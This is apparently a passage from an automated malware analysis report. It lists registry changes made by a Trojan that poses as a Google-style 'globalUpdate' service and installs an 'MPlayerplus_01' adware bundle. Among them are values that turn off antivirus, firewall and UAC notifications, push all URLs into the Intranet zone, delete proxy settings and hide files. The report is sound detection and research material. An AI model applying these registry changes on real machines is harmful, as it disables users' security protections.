[HKCR\CLSID\{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoCreateAsync"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebMachine]
"(Default)" = "Google Update Broker Class Factory"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\globalUpdate.OneClickProcessLauncherMachine\CLSID]
"(Default)" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback"
[HKCR\Interface\{59D188FA-757A-424E-8C93-F58FFD896BD7}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}]
"(Default)" = "IOneClickProcessLauncher"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\globalUpdateUpdate.CredentialDialogMachine]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{9B4F7CFE-987D-410E-A8E4-20182E0B3C24}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoreMachineClass.1\CLSID]
"(Default)" = "{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\Elevation]
"Enabled" = "1"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}]
"CLSID" = "{5E89ACE9-E16B-499A-87B4-0DBF742404C1}"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}]
"(Default)" = "Google Update Core Class"
[HKCR\Interface\{224FE662-1E6D-4BC0-AEBB-9E2FB4057BE9}]
"(Default)" = "ICoCreateAsync"
[HKCR\globalUpdate.OneClickProcessLauncherMachine.1.0]
"(Default)" = "globalUpdate.OneClickProcessLauncher"
[HKCR\CLSID\{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}]
"(Default)" = "PSFactoryBuffer"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}]
"(Default)" = "IPackage"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}\NumMethods]
"(Default)" = "5"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher"
[HKCR\globalUpdateUpdate.ProcessLauncher\CurVer]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\Interface\{0C40F472-7407-4467-8914-1DEA7C326972}]
"(Default)" = "IAppWeb"
[HKCR\globalUpdateUpdate.CoCreateAsync]
"(Default)" = "CoCreateAsync"
[HKCR\Interface\{555D7146-94A8-4C94-AE76-C39CDC7F7705}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{5E89ACE9-E16B-499A-87B4-0DBF742404C1}\VersionIndependentProgID]
"(Default)" = "globalUpdate.OneClickProcessLauncherMachine"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}\ProgID]
"(Default)" = "globalUpdateUpdate.ProcessLauncher.1.0"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0\CLSID]
"(Default)" = "{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateBroker.exe"
[HKCR\Interface\{A6D54287-7939-466A-8579-92546D946C8C}\NumMethods]
"(Default)" = "4"
[HKCR\globalUpdateUpdate.CoreMachineClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\globalUpdateUpdate.CoCreateAsync.1.0\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{8529FAA3-5BFD-43C1-AB35-B53C4B96C6E5}]
"(Default)" = "Google Update Process Launcher Class"
[HKCR\Interface\{A8F7D0A5-7074-40B8-9BDC-1174BDD0A132}\NumMethods]
"(Default)" = "4"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}]
"(Default)" = "IAppBundle"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{DD1F043F-ABC8-4643-8B95-D2C5B22BB019}\NumMethods]
"(Default)" = "6"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachine.1.0\CLSID]
"(Default)" = "{ADBC39BE-3D20-4333-8D99-E91EB1B62474}"
[HKCR\globalUpdateUpdate.Update3WebMachine\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebMachine.1.0"
[HKCR\CLSID\{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\Interface\{E3F3E8F9-F747-4DD6-BA6B-82A6CE1E0860}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\Interface\{D14D64BC-A0E4-42E3-BB72-FB41EA43C198}\NumMethods]
"(Default)" = "10"
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\psmachine.dll"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0]
"(Default)" = "GoogleUpdate CredentialDialog"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\CLSID\{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}\Elevation]
"IconReference" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-1004"
[HKCR\Interface\{4517D94C-19BA-46FA-BE66-2A30CEAC4A85}\NumMethods]
"(Default)" = "39"
[HKCR\Interface\{07F41522-AF7D-4F26-B394-094F059FDB8A}]
"(Default)" = "IAppBundleWeb"
[HKCR\globalUpdateUpdate.OnDemandCOMClassMachineFallback]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{69F256DF-BA98-45E9-86EA-FC3CFECF9D30}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\Interface\{823AE2EB-E62C-4847-B192-C99B91B92416}\ProxyStubClsid32]
"(Default)" = "{CFC47BB5-5FB5-4AD0-8427-6AA04334A3FC}"
[HKCR\globalUpdateUpdate.CoCreateAsync\CLSID]
"(Default)" = "{E06CA7F5-BA34-4FF6-8D24-B1BDC594D91F}"
[HKCR\CLSID\{FD8E81D0-F5FE-4CB1-9AEA-1E163D2BAB78}]
"LocalizedString" = "@%Program Files%\globalUpdate\Update\1.3.25.0\goopdate.dll,-3000"
[HKCR\Interface\{212E6D43-6062-492A-B8CC-144669FF11ED}]
"(Default)" = "IAppVersion"
[HKCR\Interface\{3CC60715-D6C5-429D-830E-43FA3F86C61D}]
"(Default)" = "IProgressWndEvents"
[HKCR\Interface\{3A807417-B46D-4D37-8C9A-19AC6DE204F9}]
"(Default)" = "IBrowserHttpRequest2"
[HKCR\CLSID\{6E87FC94-9866-49B9-8E93-5736D6DE3DD7}\LocalServer32]
"(Default)" = "%Program Files%\globalUpdate\Update\1.3.25.0\GoogleUpdateOnDemand.exe"
[HKCR\globalUpdateUpdate.Update3WebMachineFallback\CLSID]
"(Default)" = "{F6421EE5-A5BE-4D31-81D5-C16B7BF48E4C}"
[HKCR\Interface\{8120D9D6-785C-4413-9C0C-DF2028C56FAD}]
"(Default)" = "IGoogleUpdate"
[HKCR\globalUpdateUpdate.CredentialDialogMachine.1.0\CLSID]
"(Default)" = "{834469E3-CA2B-4F21-A5CA-4F6F4DBCDE87}"
The Trojan deletes the following registry key(s):
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}]
[HKCR\CLSID\{02A96331-0CA6-40E2-A87D-C224601985EB}\InprocHandler32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}\InprocServer32]
[HKCR\CLSID\{E0ADB535-D7B5-4D8B-B15D-578BDD20D76A}]
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process GoogleUpdate.exe:1288 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CurVer]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.CoreClass\CurVer]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.CoreClass\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3WebSvc]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0]
"(Default)" = "Update3COMClass"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "Update3COMClass"
[HKCR\AppID\GoogleUpdate.exe]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc"
[HKCR\globalUpdateUpdate.CoreClass]
"(Default)" = "Google Update Core Class"
[HKCR\globalUpdateUpdate.Update3WebSvc\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.CoreClass"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"(Default)" = "ServiceModule"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}\ProgID]
"(Default)" = "globalUpdateUpdate.CoreClass.1"
[HKCR\globalUpdateUpdate.Update3COMClassService]
"(Default)" = "Update3COMClass"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\globalUpdateUpdate.Update3WebSvc.1.0\CLSID]
"(Default)" = "{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}"
[HKCR\globalUpdateUpdate.Update3COMClassService\CurVer]
"(Default)" = "globalUpdateUpdate.Update3COMClassService.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"ServiceParameters" = "/comsvc"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}\ProgID]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"LocalService" = "globalUpdatem"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"AppID" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 9D 5B 2C 25 22 B6 61 FA EC BE 47 B7 0C F6 F1"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0]
"(Default)" = "Google Update Legacy On Demand"
[HKCR\CLSID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}\ProgID]
"(Default)" = "globalUpdateUpdate.OnDemandCOMClassSvc.1.0"
[HKCR\globalUpdateUpdate.CoreClass.1\CLSID]
"(Default)" = "{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}"
[HKCR\globalUpdateUpdate.CoreClass.1]
"(Default)" = "Google Update Core Class"
[HKCR\AppID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}]
"LocalService" = "globalUpdate"
[HKCR\globalUpdateUpdate.Update3WebSvc\CurVer]
"(Default)" = "globalUpdateUpdate.Update3WebSvc.1.0"
[HKCR\AppID\{3278F5CF-48F3-4253-A6BB-004CE84AF492}]
"(Default)" = "ServiceModule"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\CLSID\{577975B8-C40E-43E6-B0DE-4C6B44088B52}\VersionIndependentProgID]
"(Default)" = "globalUpdateUpdate.Update3COMClassService"
[HKCR\globalUpdateUpdate.Update3COMClassService.1.0\CLSID]
"(Default)" = "{577975B8-C40E-43E6-B0DE-4C6B44088B52}"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"(Default)" = "GoogleUpdate Update3Web"
[HKCR\CLSID\{3B5702BA-7F4C-4D1A-B026-1E9A01D43978}]
"(Default)" = "Google Update Core Class"
[HKCR\CLSID\{7E49F793-B3CD-4BF7-8419-B34B8BD30E61}]
"AppID" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
[HKCR\globalUpdateUpdate.OnDemandCOMClassSvc.1.0\CLSID]
"(Default)" = "{3278F5CF-48F3-4253-A6BB-004CE84AF492}"
The Trojan deletes the following registry key(s):
[HKCR\AppID\GoogleUpdate.exe]
The process GoogleUpdate.exe:2364 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "39 18 34 09 4C C7 E6 81 D7 1A AA 6A A0 D2 1D 06"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
[HKLM\SOFTWARE\GlobalUpdate\Update]
"eulaaccepted"
The process GoogleUpdate.exe:2356 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 50 26 F1 F0 98 AB 00 17 4C 40 9D 67 39 12 4B"
[HKCU\Software\globalUpdate\Update\proxy]
"source" = "IE"
The Trojan deletes the following value(s) in the system registry:
[HKLM\SOFTWARE\GlobalUpdate\Update\network\secure]
"sk"
"c"
The process 772406a5-70fe-462f-841c-e18bdccbdc78-3.exe:1540 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 8B 23 88 65 65 F9 5D 2D BE 45 A6 87 AB C1 8A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
The process Iufkopcpdfjpcg.exe:424 makes changes in the system registry.
The Trojan creates and/or sets the following values in the system registry:
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw6.tmp\extensionData\,"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Name" = "Freeven"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\InstalledBrowserExtensions\Freeven]
"54246" = "MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"Publisher" = "Freeven"
[HKCU\Software\InstalledBrowserExtensions\21636]
"54246" = "MPlayerplus_01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"UninstallString" = "%Program Files%\MPlayerplus_01\Uninstall.exe /fcp=1"
"DisplayName" = "MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Verifier" = "60aa827dc6ab7283db367fb7eb2cda1a"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppName" = "MPlayerplus_01-bg.exe"
[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"Bic" = "EAEB041DFB674B59BB4BCF5DE150DAB5IE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"DisplayVersion" = "1.34.5.12"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"Policy" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"CrPublisherId" = "21636"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"CrAppId" = "54246"
[HKLM\SOFTWARE\MPlayerplus_01\Installer]
"BundledChrome" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"AppName" = "MPlayerplus_01-bg.exe"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"srcid_var" = "001359"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{38790fbf-9167-446b-b7c6-0cad3b2fa405}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayerplus_01]
"DisplayIcon" = "%Program Files%\MPlayerplus_01\utils.exe"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppName" = "MPlayerplus_01-codedownloader.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppName" = "MPlayerplus_01-codedownloader.exe"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21636]
"54246" = "MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8D 9B AC B7 08 AE 3C 95 8A CB 9E E3 B4 AF DF 7B"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"MPlayerplus_01-bg.exe" = "8000"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{b13cb685-2858-4509-bb2e-34e3545b73f9}]
"pv" = "1.3.25.0"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"AppPath" = "%Program Files%\MPlayerplus_01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\MPlayerplus_01\Installer]
"BundledFirefox" = "1"
"BundledIe" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{e12dba9d-4d8a-47a1-9cc6-eeb9a4dda190}]
"Policy" = "3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting\DW]
"DWFileTreeRoot"
The process MPlayerplus_01-bg.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A4 66 9A 82 C6 A9 5C 2A BA 11 AA 66 12 93 F0 B4"
The process 772406a5-70fe-462f-841c-e18bdccbdc78-4.exe:2112 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 B8 6F 84 AA 5F DB F5 AC 99 5D CC C9 A8 C4 88"
The process %original file name%.exe:688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Aas]
[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Aas\695404737]
"28676484" = "35"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Aas\695404737]
"7169121" = "218"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 8B CF 82 61 5C 66 6D AB D0 2F EA 78 DA 6A 10"
[HKCU\Software\Aas\695404737]
"21507363" = "0"
[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UpdatesDisableNotify" = "1"
[HKCU\Software\Aas]
"a4_337" = "2415993777"
"a4_336" = "2408824656"
"a4_339" = "2430332019"
"a4_338" = "2423162898"
